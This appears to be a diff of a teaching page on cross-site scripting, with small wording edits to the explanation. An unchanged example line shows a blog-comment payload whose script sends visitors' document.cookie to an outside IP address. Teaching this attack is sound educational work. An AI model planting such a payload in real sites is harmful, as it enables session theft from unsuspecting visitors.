se-edu/learningresources/contents/security/crossSiteScripting/crossSiteScripting.md

 becomes: I **like** your blog post!

-The problem of not checking the user's input is when the user starts using HTML for malicious purposes.
+The problem arises when the commenter starts using HTML for malicious purposes.
 For example, HTML also supports `<script>`, for you to write JavaScript code on the webpage as well.

 ```html
 This is an innocent looking comment. <script>sendToServer("http://139.241.0.3/", document.cookie)</script>
 ```

-While any visitors of the blog will only see the non-script portion of the comments (i.e. `This is an innocent looking comment.`), the browser will not show the script portion of the comment, because it is legal HTML (you won't see the tags like `<b>` and `<i>` when viewing webpages, so you definitely won't see
+While visitors of the blog will only see the non-script portion of the comments (i.e. `This is an innocent looking comment.`), the browser will not show the script portion of the comment, because it is legal HTML (you won't see the tags like `<b>` and `<i>` when viewing webpages, so you definitely won't see